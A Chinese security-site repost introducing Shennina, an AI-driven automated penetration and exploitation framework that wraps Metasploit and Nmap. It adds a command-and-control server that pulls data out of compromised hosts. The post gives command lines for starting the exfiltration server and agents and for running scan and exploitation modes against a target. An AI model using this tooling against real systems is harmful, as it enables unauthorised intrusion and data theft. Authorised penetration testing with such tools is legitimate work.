自动化主机渗透工具 Shennina

admin
admin
admin
101400
文章
87
评论
2022年12月28日11:46:46评论116 views字数 910阅读3分2秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

Shennina是一款功能强大的自动化主机渗透/漏洞利用框架,该项目的主要目的是使用人工智能技术来实现安全扫描、漏洞扫描/分析和漏洞利用开发的完全自动化。Shennina整合了Metasploit和Nmap这两款强大的网络安全工具实现其部分功能,并执行渗透测试。除此之外,该工具还整合了一个命令控制服务器用于从目标主机中自动过滤数据。

0x02 安装与使用

1、过滤服务器-代理

Linux/macOS./exfiltration-server/agent.shWindows./exfiltration-server/agent.ps1

2、过滤服务器-运行

$ cd ./exfiltration-server/$ ./run-server.sh

3、MSFRPCD服务器

./scripts/run-msfrp.py

4、运行服务扫描

$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only

5、以训练模式运行Shennina

$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local

6、渗透测试模式

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode

7、渗透测试模式-启发式

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

自动化主机渗透工具 -- Shennina

自动化主机渗透工具 -- Shennina


原文始发于微信公众号(网络安全者):自动化主机渗透工具 -- Shennina

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月28日11:46:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   自动化主机渗透工具 Shenninahttp://cn-sec.com/archives/1483774.html

发表评论

匿名网友 填写信息